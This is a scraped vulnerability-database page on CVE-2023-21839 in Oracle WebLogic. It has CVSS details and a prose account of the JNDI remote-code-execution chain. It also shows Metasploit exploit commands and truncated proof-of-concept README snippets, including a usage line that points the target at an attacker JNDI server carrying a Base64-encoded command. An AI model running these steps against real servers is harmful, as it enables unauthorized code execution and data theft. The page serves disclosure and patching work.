Published: 18/01/2023 Updated: 12/06/2023

CVSS v3 Base Score: 7.5 | Impact Score: 3.6 | Exploitability Score: 3.9

VMScore: 0

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).

Vulnerable Product	Search on Vulmon	Subscribe to Product
oracle weblogic server 12.2.1.3.0
oracle weblogic server 12.2.1.4.0
oracle weblogic server 14.1.1.0.0

Oracle Weblogic versions 122130, 122140 and 141100 prior to the Jan 2023 security update are vulnerable to an unauthenticated remote code execution vulnerability due to a post deserialization vulnerability This Metasploit module exploits this vulnerability to trigger the JNDI connection to a LDAP server you control The LDAP server wil ...

Oracle Weblogic 122130, 122140 and 141100 prior to the Jan 2023 security update are vulnerable to an unauthenticated remote code execution vulnerability due to a post deserialization vulnerability This occurs when an attacker serializes a "ForeignOpaqueReference" class object, deserializes it on the target, and then ...

Oracle Weblogic 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 prior to the Jan 2023 security update are vulnerable to an unauthenticated remote code execution vulnerability due to a post deserialization vulnerability. This occurs when an attacker serializes a "ForeignOpaqueReference" class object, deserializes it on the target, and then post deserialization, calls the object's "getReferent()" method, which will make use of the "ForeignOpaqueReference" class's "remoteJNDIName" variable, which is under the attackers control, to do a remote loading of the JNDI address specified by "remoteJNDIName" via the "lookup()" function. This can in turn lead to a deserialization vulnerability whereby an attacker supplies the address of a HTTP server hosting a malicious Java class file, which will then be loaded into the Oracle Weblogic process's memory and an attempt to create a new instance of the attacker's class will be made. Attackers can utilize this to execute arbitrary Java code during the instantiation of the object, thereby getting remote code execution as the "oracle" user. This module exploits this vulnerability to trigger the JNDI connection to a LDAP server we control. The LDAP server will then respond with a remote reference response that points to a HTTP server that we control, where the malicious Java class file will be hosted. Oracle Weblogic will then make a HTTP request to retrieve the malicious Java class file, at which point our HTTP server will serve up the malicious class file and Oracle Weblogic will instantiate an instance of that class, granting us RCE as the "oracle" user. This vulnerability was exploited in the wild as noted by KEV on May 1st 2023: https://www.fortiguard.com/outbreak-alert/oracle-weblogic-server-vulnerability

msf > use exploit/multi/iiop/cve_2023_21839_weblogic_rce
msf exploit(cve_2023_21839_weblogic_rce) > show targets
    ...targets...
msf exploit(cve_2023_21839_weblogic_rce) > set TARGET < target-id >
msf exploit(cve_2023_21839_weblogic_rce) > show options
    ...show and set options...
msf exploit(cve_2023_21839_weblogic_rce) > exploit

Weblogic-CVE-2023-21839 CVE-2023-21839 根据网络公开poc造的轮子影响版本 122130 122140 141100 使用方法 java -jar 目标ip:端口 ldap地址推荐工具： githubcom/WhiteHSBG/JNDIExploit 免责声明此工具仅作为网络安全攻防研究交流，请使用者遵照网络安全法合理使用！如果使用者使用该工具出现任

CVE-2024-20931 Oracle A RCE vuln based on Weblogic T3\IIOP protocol

🚨 CVE-2024-20931 🚨 CVE-2024-20931 Oracle A RCE vuln based on Weblogic T3\IIOP protocol A new attack surface for JNDI injection-CVE-2024-20931 analysis introduction In the latest official January 2024 patch released by Oracle, a remote command execution vulnerability CVE-2024-20931 based on the Weblogic T3\IIOP protocol has been fixed This vulnerability was submitted to O

CVE-2024-20931, this is the bypass of the patch of CVE-2023-21839

CVE-2024-20931 CVE-2024-20931, this is the bypass of the patch of CVE-2023-21839 Oracle Weblogic Usage: Setup JNDI, the specific one from githubcom/WhiteHSBG/JNDIExploit/ Exploit: java -jar CVE-2024-20931jar Please input target IP:127001 Please input target port:7001 Please input RMI Address(ip:port/exp):JNDISERVER:1389/Basic/Command/Base64/BASE64COMMAND

POC&EXP of CVE-2023-21839 CVE-2023-21839 Analysis Article JNDI-Injection-Exploit Description Before running the PoC script, it's advisable to add the following JAR files as library dependencies: coherence\lib oracle_common\lib oracle_common\modules wlserver\modules POC&EXP satoshi-boxcom/pay/CJiWn8

CVE-2023-21839 Python版本

CVE-2023-21839 依据特殊需求将@4ra1n 大佬的GO版本翻译成了Python，再此感谢！免责声明本程序应仅用于授权的安全测试与研究目的，请使用者遵照网络安全法合理使用。使用者使用该工具出现任何非法攻击等违法行为，与作者无关。使用 vulhub 复现：链接 ___ __ ____ ___ ____ _____

CVE-2023-21839-metasploit-scanner Usage git clone githubcom/kurehalin/CVE-2023-21839-metasploit-scanner cd CVE-2023-21839-metasploit-scanner mkdir -p ~/msf4/modules/auxiliary/scanner/http cp weblogic_iiop_rcepy ~/msf4/modules/auxiliary/scanner/http chmod +x ~/msf4/modules/auxiliary/scanner/http/weblogic_iiop_rcepy msfconsole POC usage use auxiliary/scanner/http/we

CVE-2023-21839工具

CVE-2023-21839 分析该漏洞是因为通过t3或iiop协议绑定了对象之后调用lookup或list方法的时候触发了绑定对象的getReferent方法调用栈 t3协议的 getObjectInstance:96, WLNamingManager (weblogicjndiinternal) resolveObject:377, ServerNamingNode (weblogicjndiinternal) resolveObject:856, BasicNamingNode (weblogicjndiinternal) lookup:209, Bas

CVE-2023-21839 exp

CVE-2023-21839 Weblogic RCE Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core) Supported versions that are affected are 122130, 122140 and 141100 Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server Successful attacks of this vulnerabil

Weblogic-CVE-2023-21839 CVE-2023-21839 根据网络公开poc造的轮子影响版本 122130 122140 141100 使用方法 java -jar 目标ip:端口 ldap地址推荐工具： githubcom/WhiteHSBG/JNDIExploit 免责声明此工具仅作为网络安全攻防研究交流，请使用者遵照网络安全法合理使用！如果使用者使用该工具出现任

Mirai botnet loves exploiting your unpatched TP-Link routers, CISA warns

The Register

Topics Security Off-Prem On-Prem Software Offbeat Special Features Vendor Voice Vendor Voice Resources Oracle and Apache holes also on Uncle Sam's list of big bad abused bugs

The US government's Cybersecurity and Infrastructure Security Agency (CISA) is adding three more flaws to its list of known-exploited vulnerabilities, including one involving TP-Link routers that is being targeted by the operators of the notorious Mirai botnet. The other two placed on the list this week involve versions of Oracle's WebLogic Server software and the Apache Foundation's Log4j Java logging library. The command-injection flaw in TP-Link's Archer AX21 Wi-Fi 6 routers – tracked as CV...

CVE-2023-21839

Vulnerability Summary

Vulnerability Trend

Exploits

Metasploit Modules

Github Repositories

Recent Articles

References

Vulmon Search

About

Products

Connect